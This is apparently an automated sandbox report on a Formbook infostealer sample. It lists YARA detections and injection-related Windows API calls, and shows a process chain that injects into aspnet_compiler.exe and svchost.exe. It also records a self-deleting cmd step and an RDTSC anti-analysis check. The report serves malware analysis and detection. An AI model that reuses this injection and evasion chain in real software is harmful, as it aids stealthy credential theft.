Source: 00000002.00000002.359013651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.529429210.00000000034D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.529429210.00000000034D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.311031707.0000000007126000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.311031707.0000000007126000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.295364991.0000000007126000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.295364991.0000000007126000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.359257959.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.359257959.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000000.267043761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000000.267043761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.528926429.0000000000C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.528926429.0000000000C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.529505063.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.529505063.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000000.267329216.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000000.267329216.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.273482433.00000000041A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.273482433.00000000041A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: String function: 0151B150 appears 139 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0392B150 appears 145 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_004185D0 NtCreateFile, 2_2_004185D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_00418680 NtReadFile, 2_2_00418680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_00418700 NtClose, 2_2_00418700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_004187B0 NtAllocateVirtualMemory, 2_2_004187B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_004185CA NtCreateFile, 2_2_004185CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0041867A NtReadFile, 2_2_0041867A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_004186CB NtReadFile, 2_2_004186CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_004187AA NtAllocateVirtualMemory, 2_2_004187AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01559910 NtAdjustPrivilegesToken,LdrInitializeThunk, 2_2_01559910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015599A0 NtCreateSection,LdrInitializeThunk, 2_2_015599A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01559840 NtDelayExecution,LdrInitializeThunk, 2_2_01559840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01559860 NtQuerySystemInformation,LdrInitializeThunk, 2_2_01559860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015598F0 NtReadVirtualMemory,LdrInitializeThunk, 2_2_015598F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01559A50 NtCreateFile,LdrInitializeThunk, 2_2_01559A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01559A00 NtProtectVirtualMemory,LdrInitializeThunk, 2_2_01559A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01559A20 NtResumeThread,LdrInitializeThunk, 2_2_01559A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01559540 NtReadFile,LdrInitializeThunk, 2_2_01559540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015595D0 NtClose,LdrInitializeThunk, 2_2_015595D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01559710 NtQueryInformationToken,LdrInitializeThunk, 2_2_01559710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01559FE0 NtCreateMutant,LdrInitializeThunk, 2_2_01559FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01559780 NtMapViewOfSection,LdrInitializeThunk, 2_2_01559780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015597A0 NtUnmapViewOfSection,LdrInitializeThunk, 2_2_015597A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01559660 NtAllocateVirtualMemory,LdrInitializeThunk, 2_2_01559660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015596E0 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_015596E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01559950 NtQueueApcThread, 2_2_01559950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015599D0 NtCreateProcessEx, 2_2_015599D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0155B040 NtSuspendThread, 2_2_0155B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01559820 NtEnumerateKey, 2_2_01559820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015598A0 NtWriteVirtualMemory, 2_2_015598A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01559B00 NtSetValueKey, 2_2_01559B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0155A3B0 NtGetContextThread, 2_2_0155A3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01559A10 NtQuerySection, 2_2_01559A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01559A80 NtOpenDirectoryObject, 2_2_01559A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01559560 NtWriteFile, 2_2_01559560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0155AD30 NtSetContextThread, 2_2_0155AD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01559520 NtWaitForSingleObject, 2_2_01559520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015595F0 NtQueryInformationFile, 2_2_015595F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01559770 NtSetInformationFile, 2_2_01559770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0155A770 NtOpenThread, 2_2_0155A770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01559760 NtOpenProcess, 2_2_01559760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0155A710 NtOpenProcessToken, 2_2_0155A710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01559730 NtQueryVirtualMemory, 2_2_01559730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01559650 NtQueryValueKey, 2_2_01559650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01559670 NtQueryInformationProcess, 2_2_01559670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01559610 NtEnumerateValueKey, 2_2_01559610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015596D0 NtCreateKey, 2_2_015596D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03969A50 NtCreateFile,LdrInitializeThunk, 12_2_03969A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039699A0 NtCreateSection,LdrInitializeThunk, 12_2_039699A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03969910 NtAdjustPrivilegesToken,LdrInitializeThunk, 12_2_03969910
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03969840 NtDelayExecution,LdrInitializeThunk, 12_2_03969840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03969860 NtQuerySystemInformation,LdrInitializeThunk, 12_2_03969860
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03969780 NtMapViewOfSection,LdrInitializeThunk, 12_2_03969780
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03969FE0 NtCreateMutant,LdrInitializeThunk, 12_2_03969FE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03969710 NtQueryInformationToken,LdrInitializeThunk, 12_2_03969710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039696D0 NtCreateKey,LdrInitializeThunk, 12_2_039696D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039696E0 NtFreeVirtualMemory,LdrInitializeThunk, 12_2_039696E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03969650 NtQueryValueKey,LdrInitializeThunk, 12_2_03969650
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03969660 NtAllocateVirtualMemory,LdrInitializeThunk, 12_2_03969660
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039695D0 NtClose,LdrInitializeThunk, 12_2_039695D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03969540 NtReadFile,LdrInitializeThunk, 12_2_03969540
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0396A3B0 NtGetContextThread, 12_2_0396A3B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03969B00 NtSetValueKey, 12_2_03969B00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03969A80 NtOpenDirectoryObject, 12_2_03969A80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03969A10 NtQuerySection, 12_2_03969A10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03969A00 NtProtectVirtualMemory, 12_2_03969A00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03969A20 NtResumeThread, 12_2_03969A20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039699D0 NtCreateProcessEx, 12_2_039699D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03969950 NtQueueApcThread, 12_2_03969950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039698A0 NtWriteVirtualMemory, 12_2_039698A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039698F0 NtReadVirtualMemory, 12_2_039698F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03969820 NtEnumerateKey, 12_2_03969820
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0396B040 NtSuspendThread, 12_2_0396B040
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039697A0 NtUnmapViewOfSection, 12_2_039697A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0396A710 NtOpenProcessToken, 12_2_0396A710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03969730 NtQueryVirtualMemory, 12_2_03969730
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0396A770 NtOpenThread, 12_2_0396A770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03969770 NtSetInformationFile, 12_2_03969770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03969760 NtOpenProcess, 12_2_03969760
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03969610 NtEnumerateValueKey, 12_2_03969610
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03969670 NtQueryInformationProcess, 12_2_03969670
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_039695F0 NtQueryInformationFile, 12_2_039695F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0396AD30 NtSetContextThread, 12_2_0396AD30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03969520 NtWaitForSingleObject, 12_2_03969520
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_03969560 NtWriteFile, 12_2_03969560
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00C785D0 NtCreateFile, 12_2_00C785D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00C78680 NtReadFile, 12_2_00C78680
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00C787B0 NtAllocateVirtualMemory, 12_2_00C787B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00C78700 NtClose, 12_2_00C78700
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00C785CA NtCreateFile, 12_2_00C785CA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00C786CB NtReadFile, 12_2_00C786CB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00C7867A NtReadFile, 12_2_00C7867A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00C787AA NtAllocateVirtualMemory, 12_2_00C787AA
Source: fooYgfbxno.exe, 00000001.00000002.268862747.0000000002D21000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTHEDEVILISHERE.dll> vs fooYgfbxno.exe
Source: fooYgfbxno.exe, 00000001.00000002.268183318.000000000082C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameBMCXBMXCKSKS.exe: vs fooYgfbxno.exe
Source: fooYgfbxno.exe, 00000001.00000002.268789828.0000000001300000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTHEDEVILISHERE.dll> vs fooYgfbxno.exe
Source: fooYgfbxno.exe, 00000001.00000002.272166008.0000000003D8A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameResourceAssembly.dllD vs fooYgfbxno.exe
Source: fooYgfbxno.exe, 00000001.00000002.268464852.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs fooYgfbxno.exe
Source: fooYgfbxno.exe Binary or memory string: OriginalFilenameBMCXBMXCKSKS.exe: vs fooYgfbxno.exe
Source: fooYgfbxno.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: fooYgfbxno.exe Virustotal: Detection: 31%
Source: fooYgfbxno.exe ReversingLabs: Detection: 43%
Source: C:\Users\user\Desktop\fooYgfbxno.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\fooYgfbxno.exe "C:\Users\user\Desktop\fooYgfbxno.exe"
Source: C:\Users\user\Desktop\fooYgfbxno.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\fooYgfbxno.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\fooYgfbxno.exe.log
Source: classification engine Classification label: mal100.troj.evad.winEXE@8/1@10/6
Source: C:\Users\user\Desktop\fooYgfbxno.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4804:120:WilError_01
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\fooYgfbxno.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: fooYgfbxno.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: fooYgfbxno.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Source: fooYgfbxno.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\VICTOR\Downloads\Documents\CryptoObfuscator_Output\BMCXBMXCKSKS.pdb source: fooYgfbxno.exe
Source: Binary string: THEDEVILISHERE.pdb source: fooYgfbxno.exe, 00000001.00000002.268862747.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, fooYgfbxno.exe, 00000001.00000002.268789828.0000000001300000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: THEDEVILISHERE.pdbXqnq `q_CorDllMainmscoree.dll source: fooYgfbxno.exe, 00000001.00000002.268862747.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, fooYgfbxno.exe, 00000001.00000002.268789828.0000000001300000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\VICTOR\Downloads\Documents\CryptoObfuscator_Output\BMCXBMXCKSKS.pdbBSJB source: fooYgfbxno.exe
Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 00000002.00000002.359318086.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000003.267648004.00000000011BA000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000003.268985043.0000000001354000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000002.359556094.000000000160F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.530185566.0000000003A1F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.358994253.0000000003500000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.529853249.0000000003900000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.360259300.0000000003700000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000002.00000002.359318086.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000003.267648004.00000000011BA000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000003.268985043.0000000001354000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000002.359556094.000000000160F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, svchost.exe, 0000000C.00000002.530185566.0000000003A1F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.358994253.0000000003500000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.529853249.0000000003900000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.360259300.0000000003700000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: aspnet_compiler.pdb source: svchost.exe, 0000000C.00000002.530634745.0000000003E37000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdb source: aspnet_compiler.exe, 00000002.00000002.360692800.0000000003580000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: aspnet_compiler.exe, 00000002.00000002.360692800.0000000003580000.00000040.10000000.00040000.00000000.sdmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0041B87C push eax; ret 2_2_0041B882
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0041B812 push eax; ret 2_2_0041B818
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0041B81B push eax; ret 2_2_0041B882
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0040D155 push ecx; ret 2_2_0040D156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_00418A7B push ss; ret 2_2_00418A7F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_00416232 push 00000005h; retf 2_2_00416234
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0041BCD2 push esp; ret 2_2_0041BE41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_00418CD8 push edx; ret 2_2_00418CD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_00415588 push esi; retf 2_2_0041558A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_00415F51 push CA8369B7h; retf 2_2_00415F56
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0041B7C5 push eax; ret 2_2_0041B818
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0156D0D1 push ecx; ret 2_2_0156D0E4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0397D0D1 push ecx; ret 12_2_0397D0E4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00C7B87C push eax; ret 12_2_00C7B882
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00C7B812 push eax; ret 12_2_00C7B818
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00C7B81B push eax; ret 12_2_00C7B882
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00C6D155 push ecx; ret 12_2_00C6D156
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00C78A7B push ss; ret 12_2_00C78A7F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00C76232 push 00000005h; retf 12_2_00C76234
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00C7BCD3 push esp; ret 12_2_00C7BE41
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00C78CD8 push edx; ret 12_2_00C78CD9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00C75588 push esi; retf 12_2_00C7558A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00C7B7C5 push eax; ret 12_2_00C7B818
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00C75F51 push CA8369B7h; retf 12_2_00C75F56
Source: initial sample Static PE information: section name: .text entropy: 7.92488075838
Source: C:\Users\user\Desktop\fooYgfbxno.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
